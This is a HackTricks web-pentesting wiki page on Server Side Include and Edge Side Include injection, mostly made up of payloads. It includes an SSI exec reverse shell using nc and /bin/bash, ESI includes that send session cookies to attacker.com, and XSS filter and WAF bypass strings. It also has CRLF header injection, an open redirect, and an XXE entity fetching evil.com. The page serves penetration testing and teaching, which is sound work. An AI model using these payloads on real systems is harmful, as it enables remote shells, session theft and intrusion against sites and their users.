server-side-inclusion-edge-side-inclusion-injection.md (10188B)
1 --- 2 title: "Server Side Inclusion/Edge Side Inclusion Injection" 3 section: "Web Pentesting" 4 sectionSlug: "pentesting-web" 5 sourcePath: "src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Server Side Inclusion/Edge Side Inclusion Injection 14 15 ## Server Side Inclusion Basic Information 16 17 **(Introduction taken from** [**Apache docs**](https://httpd.apache.org/docs/current/howto/ssi.html)**)**<sup>[[1]](#references)</sup> 18 19 SSI (Server Side Includes) are directives that are **placed in HTML pages, and evaluated on the server** while the pages are being served. They let you **add dynamically generated content** to an existing HTML page, without having to serve the entire page via a CGI program, or other dynamic technology.\ 20 For example, you might place a directive into an existing HTML page, such as: 21 22 `<!--#echo var="DATE_LOCAL" -->` 23 24 And, when the page is served, this fragment will be evaluated and replaced with its value: 25 26 `Tuesday, 15-Jan-2013 19:28:54 EST` 27 28 The decision of when to use SSI, and when to have your page entirely generated by some program, is usually a matter of how much of the page is static, and how much needs to be recalculated every time the page is served. SSI is a great way to add small pieces of information, such as the current time - shown above. But if a majority of your page is being generated at the time that it is served, you need to look for some other solution. 29 30 You can infer the presence of SSI if the web application uses files with the extensions**`.shtml`, `.shtm` or `.stm`**, but it's not only the case.<sup>[[1]](#references)</sup> 31 32 A typical SSI expression has the following format: 33 34 ```text 35 <!--#directive param="value" --> 36 ``` 37 38 ### Check 39 40 ```javascript 41 // Document name 42 <!--#echo var="DOCUMENT_NAME" --> 43 // Date 44 <!--#echo var="DATE_LOCAL" --> 45 46 // File inclusion 47 <!--#include virtual="/index.html" --> 48 // Including files (same directory) 49 <!--#include file="file_to_include.html" --> 50 // CGI Program results 51 <!--#include virtual="/cgi-bin/counter.pl" --> 52 // Including virtual files (same directory) 53 <!--#include virtual="file_to_include.html" --> 54 // Modification date of a file 55 <!--#flastmod file="index.html" --> 56 57 // Command exec 58 <!--#exec cmd="dir" --> 59 // Command exec 60 <!--#exec cmd="ls" --> 61 // Reverse shell 62 <!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" --> 63 64 // Print all variables 65 <!--#printenv --> 66 // Setting variables 67 <!--#set var="name" value="Rich" --> 68 69 ``` 70 71 ## Edge Side Inclusion 72 73 There is a problem **caching information or dynamic applications** as part of the content may have **varied** for the next time the content is retrieved. This is what **ESI** is used form, to indicate using ESI tags the **dynamic content that needs to be generated** before sending the cache version.\ 74 If an **attacker** is able to **inject an ESI tag** inside the cache content, then, he could be able to i**nject arbitrary content** on the document before it's sent to the users. 75 76 ### ESI Detection 77 78 The following **header** in a response from the server means that the server is using ESI: 79 80 ```text 81 Surrogate-Control: content="ESI/1.0" 82 ``` 83 84 If you can't find this header, the server **might be using ESI anyways**.\ 85 A **blind exploitation approach can also be used** as a request should arrive to the attackers server: 86 87 ```javascript 88 // Basic detection 89 hell<!--esi-->o 90 // If previous is reflected as "hello", it's vulnerable 91 92 // Blind detection 93 <esi:include src=http://attacker.com> 94 95 // XSS Exploitation Example 96 <esi:include src=http://attacker.com/XSSPAYLOAD.html> 97 98 // Cookie Stealer (bypass httpOnly flag) 99 <esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)> 100 101 // Introduce private local files (Not LFI per se) 102 <esi:include src="https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/pentesting-web/supersecret.txt"> 103 104 // Valid for Akamai, sends debug information in the response 105 <esi:debug/> 106 ``` 107 108 ### ESI exploitation 109 110 [GoSecure created](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/) a table to understand possible attacks that we can try against different ESI-capable software, depending on the functionality supported:<sup>[[2]](#references)</sup> 111 112 - **Includes**: Supports the `<esi:includes>` directive 113 - **Vars**: Supports the `<esi:vars>` directive. Useful for bypassing XSS Filters 114 - **Cookie**: Document cookies are accessible to the ESI engine 115 - **Upstream Headers Required**: Surrogate applications will not process ESI statements unless the upstream application provides the headers 116 - **Host Allowlist**: In this case, ESI includes are only possible from allowed server hosts, making SSRF, for example, only possible against those hosts 117 118 | **Software** | **Includes** | **Vars** | **Cookies** | **Upstream Headers Required** | **Host Whitelist** | 119 | :--------------------------: | :----------: | :------: | :---------: | :---------------------------: | :----------------: | 120 | Squid3 | Yes | Yes | Yes | Yes | No | 121 | Varnish Cache | Yes | No | No | Yes | Yes | 122 | Fastly | Yes | No | No | No | Yes | 123 | Akamai ESI Test Server (ETS) | Yes | Yes | Yes | No | No | 124 | NodeJS esi | Yes | Yes | Yes | No | No | 125 | NodeJS nodesi | Yes | No | No | No | Optional | 126 127 #### XSS 128 129 The following ESI directive will load an arbitrary file inside the response of the server 130 131 ```xml 132 <esi:include src=http://attacker.com/xss.html> 133 ``` 134 135 #### Bypass client XSS protection 136 137 ```xml 138 x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>> 139 140 Use <!--esi--> to bypass WAFs: 141 <scr<!--esi-->ipt>aler<!--esi-->t(1)</sc<!--esi-->ript> 142 <img+src=x+on<!--esi-->error=ale<!--esi-->rt(1)> 143 ``` 144 145 #### Steal Cookie 146 147 - Remote steal cookie 148 149 ```xml 150 <esi:include src=http://attacker.com/$(HTTP_COOKIE)> 151 <esi:include src="http://attacker.com/?cookie=$(HTTP_COOKIE{'JSESSIONID'})" /> 152 ``` 153 154 - Steal cookie HTTP_ONLY with XSS by reflecting it in the response:<sup>[[4]](#references)</sup> 155 156 ```bash 157 # This will reflect the cookies in the response 158 <!--esi $(HTTP_COOKIE) --> 159 # Reflect XSS (you can put '"><svg/onload=prompt(1)>' URL encoded and the URL encode eveyrhitng to send it in the HTTP request) 160 <!--esi/$url_decode('"><svg/onload=prompt(1)>')/--> 161 162 # It's possible to put more complex JS code to steal cookies or perform actions 163 ``` 164 165 #### Private Local File 166 167 Do not confuse this with a "Local File Inclusion": 168 169 ```html 170 <esi:include src="https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/pentesting-web/secret.txt"> 171 ``` 172 173 #### CRLF 174 175 ```html 176 <esi:include src="http://anything.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/> 177 ``` 178 179 #### Open Redirect 180 181 The following will add a `Location` header to the response<sup>[[4]](#references)</sup> 182 183 ```bash 184 <!--esi $add_header('Location','http://attacker.com') --> 185 ``` 186 187 #### Add Header 188 189 - Add header in forced request<sup>[[3]](#references)</sup> 190 191 ```xml 192 <esi:include src="http://example.com/asdasd"> 193 <esi:request_header name="User-Agent" value="12345"/> 194 </esi:include> 195 ``` 196 197 - Add header in response (useful to bypass "Content-Type: text/json" in a response with XSS)<sup>[[4]](#references)</sup> 198 199 ```bash 200 <!--esi/$add_header('Content-Type','text/html')/--> 201 202 <!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/--> 203 204 # Check the number of url_decode to know how many times you can URL encode the value 205 ``` 206 207 #### CRLF in Add header (**CVE-2019-2438)** 208 209 ```xml 210 <esi:include src="http://example.com/asdasd"> 211 <esi:request_header name="User-Agent" value="12345 212 Host: anotherhost.com"/> 213 </esi:include> 214 ``` 215 216 #### Akamai debug 217 218 This will send debug information included in the response: 219 220 ```xml 221 <esi:debug/> 222 ``` 223 224 ### ESI + XSLT = XXE 225 226 It's possible to use **`eXtensible Stylesheet Language Transformations (XSLT)`** syntax in ESI just by indicating the param **`dca`** value as **`xslt`**. Which might allow to abuse **XSLT** to create and abuse a XML External Entity vulnerability (XXE):<sup>[[3]](#references)</sup> 227 228 ```xml 229 <esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://host/poc.xsl" /> 230 ``` 231 232 XSLT file: 233 234 ```xml 235 <?xml version="1.0" encoding="ISO-8859-1"?> 236 <!DOCTYPE xxe [<!ENTITY xxe SYSTEM "http://evil.com/file" >]> 237 <foo>&xxe;</foo> 238 ``` 239 240 Check the XSLT page: 241 242 243 [Xslt Server Side Injection Extensible Stylesheet Language Transformations](/hacktricks/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations) 244 245 ## Brute-Force Detection List 246 247 248 [Ssi Esi.Txt](https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/pentesting-web/https%3A/github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssi_esi.txt) 249 250 ## References 251 252 - [1] [Apache HTTP Server Tutorial: Server Side Includes](https://httpd.apache.org/docs/current/howto/ssi.html) 253 - [2] [Beyond XSS: Edge Side Include Injection](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/) 254 - [3] [ESI Injection Part 2: Abusing specific implementations](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/) 255 - [4] [Exploring the World of ESI Injection](https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91)